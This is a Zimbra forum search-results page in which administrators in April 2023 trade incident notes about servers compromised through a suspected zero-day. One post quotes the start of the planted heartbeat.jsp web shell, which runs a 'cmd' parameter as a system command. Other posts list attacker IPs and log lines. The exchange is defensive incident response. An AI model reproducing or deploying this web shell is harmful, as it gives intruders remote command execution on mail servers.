Search found 50 matches
- Thu Apr 06, 2023 8:38 am
- Forum: Administrators
- Topic: [SOLVED] The end of Zimbra? update to 10 is impossible and 8 and 9 goes eol shortly ....
- Replies: 42
- Views: 92444
Re: The end of Zimbra? update to 10 is impossible and 8 and 9 goes eol shortly ....
Hi all, we support dozens Zimbra installations, most of them single server, some multi-server. 2 (that is "two") are running Zimbra 9.0, all others are on 8.8.15. The reason was already pointed out by Klug - our users are just not interested in the "modern UI" as it lacks soooo m...
- Tue Apr 04, 2023 4:40 pm
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Hi Chris,
thanx a lot for your feedback! I have updated the information in our Zimbra call. I pointed out that there is probably a risk for servers running P37 and p38. I have escalated this issue as much as I could.
Do you have - by any chance - serverlogs from Feb 12th?
Thanx and regards
Thomas
thanx a lot for your feedback! I have updated the information in our Zimbra call. I pointed out that there is probably a risk for servers running P37 and p38. I have escalated this issue as much as I could.
Do you have - by any chance - serverlogs from Feb 12th?
Thanx and regards
Thomas
- Tue Apr 04, 2023 2:54 pm
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
I am going to throw some stuff out there on the only server I have that isn't 0-trust. I have nginx logs back for 5 months on this server. % check_attacks.pl -logDir=`pwd` --search heartbeat [ 404] GET https://X.X.X.X/public/heartbeat.jsp Fuzz Faster U Fool v1.5.0 The above all happened on March 24...
- Tue Apr 04, 2023 2:31 pm
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Hello Thomas, The timestamp for heartbeat.jsp was 12th Feb. I have restored my mail server from a snapshot taken 16th Jan. I can confirm that heartbeat.jsp was not present and that the web interface works again. The version of Zimbra I have restored is Release 8.8.15_GA_3953.RHEL8_64_20200629025823...
- Tue Apr 04, 2023 12:51 pm
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
My Zimbra is Release 8.8.15_GA_3953.RHEL8_64_20200629025823 UNKNOWN_64 FOSS edition, Patch 8.8.15_P38, running on fully patched AlmaLinux 8.7. The only ports allowed from the Internet are SMTP and HTTP/S. Pax is installed ([zimbra@mail ~]$ pax --version gives "spax: star 1.5.3 (x86_64-unknown-...
- Tue Apr 04, 2023 8:55 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
For the infected users, is it possible your exploit is related to the issue discussed here: https://forums.zimbra.org/viewtopic.php?t=71693 ? Not in my case. The server did'nt have clamav installed. Posts to the forums describing unpatched exploits will not be approved. Hope that helps, Mark What d...
- Mon Apr 03, 2023 11:52 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Contents of the heartbeat.jsp file: <%@ page import="java.util.*,java.io.*"%><%%><%if (request.getParameter("cmd") != null) {Process p; if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){ p = Runtime.getRuntime().exec("cmd.exe /C ...
- Mon Apr 03, 2023 11:35 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
The attacker's files are: - heartbeat.jsp - info.jsp - style.css In my case, the IP address of the attacker was 185.246.188.67 (it is on the abuse list) Do you know the timestamps of the files? On my server the heartbeat.jsp had a timestamp of Feb 12th. So the files was placed there some time ago. ...
- Mon Apr 03, 2023 9:21 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Hi all, I found this in nginx.log. 185.246.188.73:45592 - - [31/Mar/2023:18:47:46 +0200] "POST https://192.168.0.1/public/heartbeat.jsp HTTP/1.1" 200 406 "-" "python-requests/2.25.1" the heartbeat.jsp was placed in /opt/zimbra/jetty/webapps/zimbra/public previousely - b...
- Mon Apr 03, 2023 8:29 am
- Forum: Administrators
- Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
- Replies: 62
- Views: 86020
Re: Down for maintenence, administrators see /opt/zimbra/status.txt
Hi all,
I opened a Zimbra case. Case No. is 01475766.
I suspect a zero day exploit - actively being exploited... I can only guess how many Zimbra servers out there are at severe risk...
Regards
Thomas
I opened a Zimbra case. Case No. is 01475766.
I suspect a zero day exploit - actively being exploited... I can only guess how many Zimbra servers out there are at severe risk...
Regards
Thomas